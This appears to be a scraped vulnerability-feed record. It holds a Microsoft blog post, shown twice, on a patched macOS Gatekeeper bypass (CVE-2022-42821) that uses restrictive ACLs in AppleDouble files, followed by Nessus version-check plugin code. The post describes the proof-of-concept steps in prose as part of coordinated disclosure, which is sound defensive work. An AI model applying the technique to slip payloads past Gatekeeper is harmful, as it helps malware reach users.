antivirus, endpoint detection and response (EDR), and threat and vulnerability management capabilities. This research also improved [Microsoft Defender\u2019s Vulnerability Management](<https://docs.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management-capabilities?view=o365-worldwide>) capabilities to discover, prioritize, and remediate misconfigurations and vulnerabilities. This includes detecting CVE-2022-42821 on [macOS devices](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac?view=o365-worldwide>) by examining AppleDouble files misusing ACLs.\n\nThis case also emphasized the need for responsible vulnerability disclosures and expert, cross-platform collaboration to effectively mitigate issues, protecting users against present and future threats. We wish to again thank the Apple product security team for their efforts and responsiveness in addressing the issue.\n\n![Microsoft Defender for Endpoint detecting and preventing an AppleDouble file](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-9.-Microsoft-Defender-for-Endpoint-preventing-the-vulnerability.png)Figure 9. Detection by Microsoft Defender for Endpoint\n\nOur Microsoft security researchers continue to discover new threats and vulnerabilities as part of our effort to secure users\u2019 computing experiences, be it a Windows or non-Windows device. In the effort to improve security for all, we will continue to share intelligence and work with the security community to create and improve upon solutions that protect users and organizations across platforms every single day.\n\n**Jonathan Bar Or**\n\nMicrosoft 365 Defender Research Team\n\nThe post [Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability](<https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-12-19T18:00:00", "type": "mmpc", "title": "Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8826", "CVE-2019-8656", "CVE-2021-1810", "CVE-2021-30657", "CVE-2021-30853", "CVE-2022-22616", "CVE-2022-26706", "CVE-2022-42821"], "modified": "2022-12-19T18:00:00", "id": "MMPC:447DB6FB8D54C72486ECF54472FDAD42", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "mssecure": [{"lastseen": "2022-12-20T03:05:39", "description": "On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple\u2019s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call \u201cAchilles\u201d. Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS.\n\nAfter carefully reviewing the implications, we shared the vulnerability with Apple in July 2022 through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/msrc/msvr>) (MSVR). Fixes for the vulnerability, now identified as [CVE-2022-42821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42821>), were quickly released by Apple to all their OS versions. We note that Apple's [Lockdown Mode](<https://www.apple.com/newsroom/2022/07/apple-expands-commitment-to-protect-users-from-mercenary-spyware/>), introduced in macOS Ventura as an optional protection feature for high-risk users that might be personally targeted by a sophisticated cyberattack, is aimed to stop zero-click remote code execution exploits, and therefore does not defend against Achilles. End-users should apply the fix regardless of their Lockdown Mode status. We thank Apple for the collaboration in addressing this issue.\n\nIn this blog post, we share information about [Gatekeeper](<https://support.apple.com/en-us/HT202491>) and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.\n\n## Unlocking the Gatekeeper security mechanism\n\nMany macOS infections are the result of users running malware, oftentimes inadvertently. Fake app bundles might masquerade themselves as different apps, like Flash Player, or as a legitimate file, such as using a PDF icon and using the app name \u201cResume\u201d. To combat this highly popular infection vector, Apple has imposed strong security mechanisms. When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named _com.apple.quarantine_ and is later used to enforce policies such as Gatekeeper or certain mitigations that prevent [sandbox escapes](<https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/>). In recent years, Apple has tightened the security policies even further, and the current Gatekeeper design dictates the following behavior for downloaded apps:\n\n 1. If the app is validly signed and notarized, meaning approved by Apple, then a prompt requires the user\u2019s consent before its launched.\n 2. Otherwise, the user is informed that the app cannot be run as it\u2019s untrusted.\n\nExtended attributes are a filesystem feature supported on common macOS filesystems, like APFS and HFS+, and their main purpose is to save file metadata. Specifically, the _com.apple.quarantine_ attribute saves information regarding the source of the downloaded file, as well as data instructing Gatekeeper how to process the file. The attribute format is generally:\n \n \n flag;date;agent_name;UUID\n\nExtended attributes can be viewed or modified with the [_xattr_](<https://ss64.com/osx/xattr.html>) command line utility.\n\nA flag value of \u201c0083\u201d enforces Gatekeeper restrictions on the file, as displayed below:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-1.-A-common-com.apple_.quarantine-extended-attribute-value.png)Figure 1. A common _com.apple.quarantine_ extended attribute value ![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-2.-Gatekeeper-blocking-an-untrusted-downloaded-file.png)Figure 2. Gatekeeper blocking an untrusted downloaded file\n\nDue to its essential role in stopping malware on macOS, Gatekeeper is a helpful and effective security feature. However, considering there have been numerous bypass techniques targeting the security feature in the past, Gatekeeper is not bulletproof. Gaining the ability to bypass Gatekeeper has dire implications as sometimes malware authors leverage those techniques for initial access.\n\n## Historical overview of Gatekeeper bypasses\n\nNumerous Gatekeeper bypasses have been identified in the past years, some even [abused by malware families](<https://www.bleepingcomputer.com/news/security/apple-fixes-macos-zero-day-bug-exploited-by-shlayer-malware/>) such as Shlayer. When examining Gatekeeper bypasses from recent years, we see two approaches:\n\n 1. Misuse the _com.apple.quarantine_ extended attribute assignment.\n 2. Find a vulnerability in the components that enforce policy checks on quarantined files.\n\nTwo cases that we don\u2019t consider to constitute a \u201ctrue\u201d Gatekeeper bypass are:\n\n 1. Using unsupported filesystems, like a USB mass storage device using FAT32, as these require non-trivial user interaction to run macOS applications.\n 2. MITRE\u2019s definition of \u201cGatekeeper Bypass\u201d ([T1553.001](<https://attack.mitre.org/techniques/T1553/001/>)), which requires code execution to forcefully modify or remove the _com.apple.quarantine_ extended attribute.\n\nHere are some examples of Gatekeeper bypass vulnerabilities discovered over the last several years:\n\n**Vulnerability**| **Exploits**| **Description** \n---|---|--- \n**[CVE-2022-22616](<https://nvd.nist.gov/vuln/detail/CVE-2022-22616>)**| Assignment of the quarantine attribute.| Gzip files archived in BOM archives are not assigned with the quarantine extended attribute, further detailed [here](<https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/>). \n**[CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>)**| Assignment of the quarantine attribute.| Paths longer than 886 characters were not assigned with extended attributes. Therefore, creating a symbolic link that points to an app that resides in a long path results in a Gatekeeper bypass. Since symbolic links are not assigned with the quarantine attribute, it was possible to completely bypass Gatekeeper, as outlined [here](<https://labs.withsecure.com/blog/the-discovery-of-cve-2021-1810/>). \n**[CVE-2021-30657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>)**| Component(s) that enforce policy checks.| App bundles with a missing _Info.plist_ and a shell script main executable component are treated incorrectly by _syspolicyd_, a component that enforces policy restrictions on apps. Writeups can be found [here](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>) and [here](<https://objective-see.org/blog/blog_0x64.html>). \n**[CVE-2021-30853](<https://nvd.nist.gov/vuln/detail/CVE-2021-30853>)**| Component(s) that enforce policy checks.| A security bug in the way files with a \u201c_Shebang_\u201d (#!) header are interpreted by _syspolicyd_ cause it to consider the app bundle to be safe, as detailed [here](<https://objective-see.org/blog/blog_0x6A.html>). \n**[CVE-2019-8656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8656>)**| Assignment of the quarantine attribute.| Since symbolic links are not assigned with the quarantine extended attribute, an archive that contains a symbolic link to an app that resides in an external filesystem (NFS) results in a Gatekeeper bypass. Apple fixed the issue by blocking the execution of applications from remote shared locations, documented [here](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>). \n**[CVE-2014-8826](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8826>)**| Component(s) that enforce policy checks.| Quarantine attributes are not checked for JAR files, which are run by Java, as summarized [here](<https://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html>). \n \n## Metadata persistence over AppleDouble\n\nIntrigued by [CVE-2021-1810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1810>), as listed in the above table, we wondered what mechanism could be leveraged in archives. Considering symbolic links are preserved in archives and aren\u2019t assigned with quarantine attributes\u2014we looked for a mechanism that could persist different kinds of metadata over archives.\n\nAfter some investigation, we discovered a way to persist important file metadata through a mechanism called AppleDouble.\n\nEven though extended attributes are common on different filesystems, they might be implemented differently or even not supported, so copying files with their metadata becomes a challenging task. To solve this problem, [back in 1994](<https://www.rfc-editor.org/rfc/rfc1740.txt>), Apple introduced the concept of AppleSingle and AppleDouble formats. In a nutshell, AppleSingle is a binary blob that is added as a part of the original file contents so that there\u2019s only a \u201csingle\u201d file to process, whereas AppleDouble saves the metadata in a different file side-by-side next to the original file, with a \u201c._\u201d prefix.\n\nInterestingly, when extracting an archive, macOS processes any attached AppleDouble file and assigns the target file with the appropriate metadata.\n\nThe AppleDouble binary file format is quite complicated, but the code that parses it can be read in the XNU git repository in [the file](<https://github.com/apple/darwin-xnu/blob/main/bsd/vfs/vfs_xattr.c>) that handles extended attributes, which also includes ASCII-art depiction of the format. To demonstrate the AppleDouble file information, we used the [_ditto_](<https://ss64.com/osx/ditto.html>) utility as such:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-3.-AppleDouble-file-created-as-._somefile.png)Figure 3. AppleDouble file created as \u201c._somefile\u201d\n\nWhen the file is archived alongside its original file and then extracted by macOS, extended attributes are fully restored, as demonstrated here:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-4.-Using-AppleDouble-in-a-zip-file-to-preserve-extended-attributes.png)Figure 4. Using AppleDouble in a zip file to preserve extended attributes\n\nUsing this newfound knowledge, we examined how we could use the AppleDouble mechanism to trick Gatekeeper in some way.\n\nOur first approach was to generate many large extended attributes in the AppleDouble format such that there won\u2019t be enough space to assign the _com.apple.quarantine_ extended attribute. Interestingly, it doesn\u2019t work\u2014AppleDouble is ignored if the overall size is over 2 GB, and there is no limitation on the number of extended attributes a file could get (besides the size of the disk).\n\nResearching further, we decided to examine the [source code](<https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html>) of the unarchiving mechanism. Carefully studying the _copyfile_unpack_ implementation, we discovered an option for a special extended attribute named _com.apple.acl.text_ (saved in the _XATTR_SECURITY_NAME_ constant in the source code), which is used to set arbitrary Access Control Lists.\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-5.-The-code-that-allows-setting-arbitrary-Access-Control-Lists-1024x560.png)Figure 5. The code that allows setting arbitrary Access Control Lists\n\n## Using ACLs for exploitation\n\nAccess Control Lists (ACLs) are a mechanism in macOS that further extends the traditional permission model. The traditional permission model saves permission for each file in a file \u201cmode\u201d, which can be changed by using the [_chmod_](<https://ss64.com/osx/chmod.html>) utility. It enforces permissions on the owning user, owning group, and others in terms of reading (r), writing (w) and launching (x). A file\u2019s mode can be viewed by listing files with the \u201c_-l_\u201d (long) flag:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-6.-Viewing-the-hello.sh-file-mode-the-owner-can-do-anything-while-others-can-only-read-or-launch-it.png)Figure 6. Viewing the "hello.sh" file mode, the owner can do anything while others can only read or launch it\n\nUnlike the traditional permission mechanism, ACLs allow fine-grained permissions to files and directories. Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules. Like the file mode, ACLs can be modified with the _chmod_ utility and viewed with the _ls_ utility. It\u2019s important to note that file access checks are dictated by both ACLs and the traditional permission model mechanisms, as demonstrated by the following example:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-7.-Denying-file-reads-from-everyone-makes-it-impossible-to-read-the-file-despite-its-mode.png)Figure 7. Denying file reads from everyone makes it impossible to read the file despite its mode\n\nThe set of authorizations supported by ACLs is well-documented by Apple in the _chmod_ manual, which contain more than the traditional reading, writing, or launching abilities, including:\n\n * _writeattr_: controls the ability to write attributes to the file\n * _writeextattr_: controls the ability to write extended attributes to the file\n * _writesecurity_: controls the ability to set ACLs to the file\n * _chown_: controls the ability to set the owner of the file\n * _delete:_ controls the ability to delete the file\n\nEquipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the _com.apple.quarantine_ attribute.\n\nTwo minor challenges that we had to overcome during the proof-of-concept (POC) development were:\n\n * The format of the ACL text as saved in the AppleDouble file isn\u2019t identical to the format of the _chmod_ command line. This can easily be overcome by invoking the macOS [_acl_to_text_](<https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/acl_to_text.3.html>) API and saving the ACL with the correct format.\n * When using the _ditto_ utility, the _com.apple.acl.text_ extended attribute is lost in the resulting AppleDouble file. This can be overcome by either manually creating the binary AppleDouble or, as we chose in this case, simply patching the resulting AppleDouble file before archiving it.\n\nTherefore, our POC is as follows:\n\n 1. Create a fake directory structure with an arbitrary icon and payload.\n 2. Create an AppleDouble file with the _com.apple.acl.text_ extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of \u201c_everyone deny write,writeattr,writeextattr,writesecurity,chown_\u201d). Perform the correct AppleDouble patching if using _ditto_ to generate the AppleDouble file.\n 3. Create an archive with the application alongside its AppleDouble file and host it on a web server.\n\nWe named our POC exploit Achilles after its use of ACLs to bypass Gatekeeper. Our POC recorded video can be viewed here:\n\nThe AppleDouble file we used for this Gatekeeper bypass can be generated, as displayed below:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-8.-Generic-AppleDouble-file-that-can-be-used-for-any-Gatekeeper-bypass.png)Figure 8. Generic AppleDouble file that can be used for any Gatekeeper bypass\n\n## Improving security for all through research and threat intelligence sharing\n\nThe threat landscape continues to evolve, delivering new threats and attack capabilities that take advantage of unpatched vulnerabilities and misconfigurations as a vector to access systems and data. Our data shows that fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks. Nonetheless, through research-driven protections and collaboration with customers, partners, and industry experts, we strive to enrich our protection technologies to defend against such issues\u2014regardless of the platform or device in use.\n\nAs environments continue to rely on a diverse range of devices and operating systems, organizations need security solutions that can provide protection across platforms and a complete picture of their security posture. Collaborative research such as this informs our comprehensive protection capabilities across platforms, allowing [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) to deliver and coordinate threat defense across all major OS platforms including Windows, macOS, Linux, Android, and iOS. On macOS devices, Microsoft Defender for Endpoint detects and exposes threats and vulnerabilities, including CVE-2022-42821, using antivirus, endpoint detection and response (EDR), and threat and vulnerability management capabilities. This research also improved [Microsoft Defender\u2019s Vulnerability Management](<https://docs.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management-capabilities?view=o365-worldwide>) capabilities to discover, prioritize, and remediate misconfigurations and vulnerabilities. This includes detecting CVE-2022-42821 on [macOS devices](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac?view=o365-worldwide>) by examining AppleDouble files misusing ACLs.\n\nThis case also emphasized the need for responsible vulnerability disclosures and expert, cross-platform collaboration to effectively mitigate issues, protecting users against present and future threats. We wish to again thank the Apple product security team for their efforts and responsiveness in addressing the issue.\n\n![Microsoft Defender for Endpoint detecting and preventing an AppleDouble file](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-9.-Microsoft-Defender-for-Endpoint-preventing-the-vulnerability.png)Figure 9. Detection by Microsoft Defender for Endpoint\n\nOur Microsoft security researchers continue to discover new threats and vulnerabilities as part of our effort to secure users\u2019 computing experiences, be it a Windows or non-Windows device. In the effort to improve security for all, we will continue to share intelligence and work with the security community to create and improve upon solutions that protect users and organizations across platforms every single day.\n\n**Jonathan Bar Or**\n\nMicrosoft 365 Defender Research Team\n\nThe post [Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability](<https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-12-19T18:00:00", "type": "mssecure", "title": "Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8826", "CVE-2019-8656", "CVE-2021-1810", "CVE-2021-30657", "CVE-2021-30853", "CVE-2022-22616", "CVE-2022-26706", "CVE-2022-42821"], "modified": "2022-12-19T18:00:00", "id": "MSSECURE:447DB6FB8D54C72486ECF54472FDAD42", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2023-05-19T15:07:28", "description": "The remote host is running a version of macOS / Mac OS X that is 10.15.x prior to 10.15.7 Security Update 2021-002 Catalina It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - An application may be able to execute arbitrary code with system privileges due to insufficient permission checks (CVE-2020-3838).\n\n - A memory corruption vulnerability could allow an application read access to restricted memory (CVE-2021-1808).\n\n - A memory corruption vulnerability could allow an application to cause unexpected system termination or to write kernel memory (CVE-2021-1828).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2021-04-28T00:00:00", "type": "nessus", "title": "macOS 10.15.x < 10.15.7 Security Update 2021-002 Catalina (HT212326)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-27942", "CVE-2020-3838", "CVE-2020-8037", "CVE-2020-8285", "CVE-2020-8286", "CVE-2021-1739", "CVE-2021-1740", "CVE-2021-1784", "CVE-2021-1797", "CVE-2021-1808", "CVE-2021-1809", "CVE-2021-1810", "CVE-2021-1811", "CVE-2021-1813", "CVE-2021-1824", "CVE-2021-1828", "CVE-2021-1834", "CVE-2021-1839", "CVE-2021-1840", "CVE-2021-1843", "CVE-2021-1847", "CVE-2021-1851", "CVE-2021-1857", "CVE-2021-1860", "CVE-2021-1868", "CVE-2021-1873", "CVE-2021-1875", "CVE-2021-1876", "CVE-2021-1878", "CVE-2021-1881", "CVE-2021-1882", "CVE-2021-30652", "CVE-2021-30657"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT212326.NASL", "href": "https://www.tenable.com/plugins/nessus/149042", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149042);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2020-3838\",\n \"CVE-2020-8037\",\n \"CVE-2020-8285\",\n \"CVE-2020-8286\",\n \"CVE-2020-27942\",\n \"CVE-2021-1739\",\n \"CVE-2021-1740\",\n \"CVE-2021-1784\",\n \"CVE-2021-1797\",\n \"CVE-2021-1808\",\n \"CVE-2021-1809\",\n \"CVE-2021-1810\",\n \"CVE-2021-1811\",\n \"CVE-2021-1813\",\n \"CVE-2021-1824\",\n \"CVE-2021-1828\",\n \"CVE-2021-1834\",\n \"CVE-2021-1839\",\n \"CVE-2021-1840\",\n \"CVE-2021-1843\",\n \"CVE-2021-1847\",\n \"CVE-2021-1851\",\n \"CVE-2021-1857\",\n \"CVE-2021-1860\",\n \"CVE-2021-1868\",\n \"CVE-2021-1873\",\n \"CVE-2021-1875\",\n \"CVE-2021-1876\",\n \"CVE-2021-1878\",\n \"CVE-2021-1881\",\n \"CVE-2021-1882\",\n \"CVE-2021-30652\",\n \"CVE-2021-30657\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT212326\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2021-04-26-3\");\n script_xref(name:\"IAVA\", value:\"2021-A-0202-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"macOS 10.15.x < 10.15.7 Security Update 2021-002 Catalina (HT212326)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 10.15.x prior to 10.15.7 Security Update 2021-002 Catalina\nIt is, therefore, affected by multiple vulnerabilities, including the following:\n\n - An application may be able to execute arbitrary code with system privileges due to insufficient permission\n checks (CVE-2020-3838).\n\n - A memory corruption vulnerability could allow an application read access to restricted memory (CVE-2021-1808).\n\n - A memory corruption vulnerability could allow an application to cause unexpected system termination or to \n write kernel memory (CVE-2021-1828).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT212326\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 10.15.7 Security Update 2021-002 Catalina or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1834\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1882\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'macOS Gatekeeper check bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\napp_info = vcf::apple::macos::get_app_info();\n\nconstraints = [\n { \n 'max_version' : '10.15.7', \n 'min_version' : '10.15', \n 'fixed_build': '19H1030', \n 'fixed_display' : '10.15.7 Security Update 2021-002 Catalina' \n }\n];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info, \n constraints:constraints, \n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:27:52", "description": "The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.3 Big Sur. It is, therefore, affected by multiple vulnerabilities including the following:\n\n - A memory corruption issue which could allow an application restricted memory read access (CVE-2021-1808).\n\n - A memory corruption issue which could allow an application to cause unexpected system termination or to write kernel memory (CVE-2021-1828).\n\n - An out-of-bounds wirte issue which could allow a malicious application to execute arbitrary code with kernel privileges (CVE-2021-1834).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2021-04-28T00:00:00", "type": "nessus", "title": "macOS 11.x < 11.3 (HT212325)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-7463", "CVE-2020-8037", "CVE-2020-8285", "CVE-2020-8286", "CVE-2021-1739", "CVE-2021-1740", "CVE-2021-1784", "CVE-2021-1808", "CVE-2021-1809", "CVE-2021-1810", "CVE-2021-1811", "CVE-2021-1813", "CVE-2021-1814", "CVE-2021-1815", "CVE-2021-1817", "CVE-2021-1820", "CVE-2021-1824", "CVE-2021-1825", "CVE-2021-1826", "CVE-2021-1828", "CVE-2021-1829", "CVE-2021-1832", "CVE-2021-1834", "CVE-2021-1839", "CVE-2021-1840", "CVE-2021-1841", "CVE-2021-1843", "CVE-2021-1846", "CVE-2021-1847", "CVE-2021-1849", "CVE-2021-1851", "CVE-2021-1853", "CVE-2021-1855", "CVE-2021-1857", "CVE-2021-1858", "CVE-2021-1859", "CVE-2021-1860", "CVE-2021-1861", "CVE-2021-1867", "CVE-2021-1868", "CVE-2021-1872", "CVE-2021-1873", "CVE-2021-1875", "CVE-2021-1876", "CVE-2021-1878", "CVE-2021-1880", "CVE-2021-1881", "CVE-2021-1882", "CVE-2021-1883", "CVE-2021-1884", "CVE-2021-1885", "CVE-2021-30652", "CVE-2021-30653", "CVE-2021-30655", "CVE-2021-30657", "CVE-2021-30658", "CVE-2021-30659", "CVE-2021-30660", "CVE-2021-30661"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT212325.NASL", "href": "https://www.tenable.com/plugins/nessus/149041", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149041);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2020-7463\",\n \"CVE-2020-8037\",\n \"CVE-2020-8285\",\n \"CVE-2020-8286\",\n \"CVE-2021-1739\",\n \"CVE-2021-1740\",\n \"CVE-2021-1784\",\n \"CVE-2021-1808\",\n \"CVE-2021-1809\",\n \"CVE-2021-1810\",\n \"CVE-2021-1811\",\n \"CVE-2021-1813\",\n \"CVE-2021-1814\",\n \"CVE-2021-1815\",\n \"CVE-2021-1817\",\n \"CVE-2021-1820\",\n \"CVE-2021-1824\",\n \"CVE-2021-1825\",\n \"CVE-2021-1826\",\n \"CVE-2021-1828\",\n \"CVE-2021-1829\",\n \"CVE-2021-1832\",\n \"CVE-2021-1834\",\n \"CVE-2021-1839\",\n \"CVE-2021-1840\",\n \"CVE-2021-1841\",\n \"CVE-2021-1843\",\n \"CVE-2021-1846\",\n \"CVE-2021-1847\",\n \"CVE-2021-1849\",\n \"CVE-2021-1851\",\n \"CVE-2021-1853\",\n \"CVE-2021-1855\",\n \"CVE-2021-1857\",\n \"CVE-2021-1858\",\n 